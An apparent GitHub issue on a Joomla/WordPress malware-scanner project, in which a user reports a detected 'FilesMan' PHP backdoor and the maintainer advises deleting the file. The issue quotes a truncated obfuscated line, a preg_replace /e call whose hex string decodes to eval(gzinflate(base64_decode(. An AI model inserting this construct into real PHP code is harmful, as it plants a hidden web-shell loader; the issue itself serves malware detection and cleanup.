Backdoor PHP Filesman - Githubissues

btoplak / Joomla-Anti-Malware-Scan-Script--JAMSS-

a Joomla! and WordPress Security script that automatically scans the Joomla! or Wordpress files for some patterns and "fingerprints" of malware, trojans or other injections into PHP code

146 stars 102 forks source link

Backdoor PHP Filesman #2

Closed lungkao closed 12 years ago

lungkao commented 12 years ago

i scan and found FilesMan

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28

btoplak commented 12 years ago

Hi Lingkao,

OK, you should then delete this file.